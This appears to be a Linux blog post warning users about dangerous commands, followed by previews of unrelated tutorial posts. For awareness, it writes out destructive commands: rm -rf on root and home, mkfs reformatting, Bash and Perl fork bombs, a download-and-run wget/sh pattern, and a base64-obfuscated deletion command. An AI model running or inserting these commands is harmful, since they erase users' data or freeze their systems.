Skip to main content

Malicious Linux commands to avoid


Warning: Don't run these commands on your machine. They can erase your valuable data or crash your machine.

It is worthwhile to have basic knowledge about malicious commands in Linux. Don't blindly run the commands instructed in websites or scripts downloaded from the internet. Just verify the contents of the script for any commands that can harm your computer.
If you want to know what a command can do use the man pages if you are offline. You can get the information of a command by typing
info <command name>
in the terminal.
Example: info sudo
If you are connected to the internet then type
man <command name>
in the terminal to get the updated documentation.
Example: man sudo
Again, the following commands can heavily damage your OS. These are extremely dangerous and should not be attempted on any computer that has any physical connection to valuable data.

1. COMMANDS THAT CAN DELETE FILES AND FOLDERS

       

rm -rf /
rm -rf .
rm -rf *
       
 

rm means remove, -f means "force" deletion (even if write protected), and -r means do it recursively, i.e. all sub folders.
rm -rf / means delete everything in the root directory and all sub folders.
rm -rf .  means delete the current directory and all sub folders.
rm -rf * means delete all files in current directory and all sub folders.
2. COMMANDS THAT CAN REFORMAT A DRIVE:
       

mkfs
mkfs.ext3
mkfs.anything        
       
 
Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.
3. FORKBOMB:
  • In Bourne-ish shells (like Bash):
       
:(){:|:&};:
           
       
 
 
  • In Perl
       
fork while fork
            
       
 
 
These commands execute a huge number of processes until the system freezes, forcing 
a hard reset of the computer (which may cause data corruption, operating system damage). 


4. TARBOMB:
This tar archive can be crafted to explode into a million files, or can inject files into the system by guessing file names. So, be careful with tar files or compressed files downloaded from the internet.


5. MALICIOUS CODE IN SHELL SCRIPTS:
       
wget http://some_address/some_file
sh ./some_file
           
       
 

Be careful while downloading scripts from the internet. They might contain benign or malicious code. Never execute code from people you don't trust.
6. MALICIOUS SOURCE CODE TO BE COMPILED THEN EXECUTED :
Do not compile or execute the resulting compiled code unless the source is some well-known application obtained from a reputable site.
It is easy to hide malicious code as a part of a source code.


7.BASE64 COMMANDS :
       
echo cm0gLXJmIH4vKg== | base64 -d
            
       
 

This is the base64 form of rm -rf ~/*
So, just be careful while executing commands or scripts.
This post isn't an exhaustive list of malicious commands. There are more malicious commands out there. So, be a command literate before you start using the command-line.

Popular posts from this blog

How to setup a wifi-hotspot in Ubuntu: The terminal way.

Ubuntu has a "Use as hotspot" mode. But it creates a n ad-hoc network only.Wireless hotspots aren't same as ad hoc networks. Significant difference is there. In short, ad hoc networks aren't supported in most Android, Windows Phone and Blackberry devices (and may be iOS devices too) whereas AP mode Wi-Fi hotspots are.

              It is really simple and easy to setup a hotspot in Ubuntu. We use a tool called ap-hotspot. To install it open a terminal and type the following:

sudo add-apt-repository ppa:nilarimogard/webupd8 sudo apt-get update sudo apt-get install ap-hotspot
             Next, to start the hotspot type the following in a terminal:
sudo ap-hotspot start
It asks you which adapter's internet you want to share, name of the network, password, etc. in an interactive manner. To stop the hotspot type the following n the terminal :
sudo ap-hotspot stop
To configure it type the following in the terminal :
sudo ap-hotspot configure

INSTALLING MOBILE PARTNER IN LINUX

Most of you who have a Huawei USB modem (data card) might have tried to install mobile partner (dash board) in Linux. Here I will show you how to install mobile partner in Linux. First, you have to copy the folder called Linux in the data card. The files in the data card are not accessible from Linux so copy them from Windows. Now right click the file “install” in the “Linux” folder. Go to the permissions tab and select the check box beside Allow executing as a program. Now open a terminal by pressing CTRL + ALT + Tkeys. Change the working directory to the folder “Linux” by using “cd <path to folder>”. Now type ./install. If you had installed this software in your system before, you will get a prompt: "The software is exist, do you want overwrites? ([Y]/[N])", enter "y" to overwrites or "n" to exit. If you do not had installed this software in your system before, you will get a prompt: "Please input the install path[/usr/local/Mobile_Partner]:"…

How to install OpenVAS 7 in Ubuntu

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.

This is a guide for installing OpenVAS in Ubuntu. 

STEP 1:

First we need to prepare our system for installation of OpenVAS. Open a terminal and type the following command:

sudo apt-get install build-essential bison flex cmake pkg-config libglib2.0-0 libglib2.0-dev libgnutls26 libgnutls-dev libpcap0.8 libpcap0.8-dev libgpgme11 libgpgme11-dev doxygen libuuid1 uuid-dev sqlfairy xmltoman libsqlite3-0 libsqlite3-dev libxml2-dev libxslt1.1 libxslt1-dev xsltproc libmicrohttpd-dev libldap-2.4-2 libldap2-dev

STEP 2:

Now we need to download the OpenVAS source packages from the OpenVAS website. You can download it from the the website or you can use the terminal to download the files using the following commands:  

mkdir openvas-srccd openvas-src/wget http://wald.intevation.org/frs/download.php/1638/openvas-libraries-7.0.1.tar.gzwget http://wald.inteva…